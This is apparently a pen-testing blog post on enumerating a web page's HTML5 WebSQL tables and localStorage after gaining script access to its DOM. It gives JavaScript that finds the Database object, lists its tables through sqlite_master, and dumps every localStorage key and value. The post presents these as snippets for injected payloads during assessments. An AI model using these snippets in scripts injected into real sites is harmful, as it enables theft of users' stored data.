HTML5 is having two important data points – WebSQL and
Storage. They are controlled by well defined RFCs and specifications. These
APIs can be accessed using JavaScript. Assuming we get an entry into DOM then
also we are completely blind with WebSQL table names and storage keys. Here is
a way to enumerate that data during pen-testing and assessments.
Blind WebSQL Enumeration
We need following information to extract target content.
1.
Database object
2.
Table structure created on SQLite
3.
User table on which we need to run select query
Here is the script which can harvest database with
zero knowledge
var
dbo;
var
table;
var
usertable;
for(i
in window){
obj = window[i];
try{
if(obj.constructor.name=="Database"){
dbo
= obj;
obj.transaction(function(tx){
tx.executeSql('SELECT
name FROM sqlite_master WHERE type=\'table\'',[],function(tx,results){
table=results;
},null);
});
}
}catch(ex){}
}
if(table.rows.length>1)
usertable=table.rows.item(1).name;
a.)
We will run through all objects and get object
where constructor is “Database”
b.)
We will make Select query directly to
sqlite_master database
c.)
We will grab 1st table leaving webkit
table on 0th entry
We got the actual table name residing on WebSQL for
this application, next we can run SQL query and loop through results.
We got the name of the table and now we can use same database object to run the query through script.
Hence, it can be part of payload during testing to fetch
data remotely.
Blind Storage Enumeration
Storage enumeration is relatively easy, We can check for
object length for local or session storage and if it is not zero run a loop and
get all values. We can use following code for localStorage.
if(localStorage.length){
console.log(localStorage.length)
for(i
in localStorage){
console.log(i)
console.log(localStorage.getItem(i));
}
}
Here is the output for the call.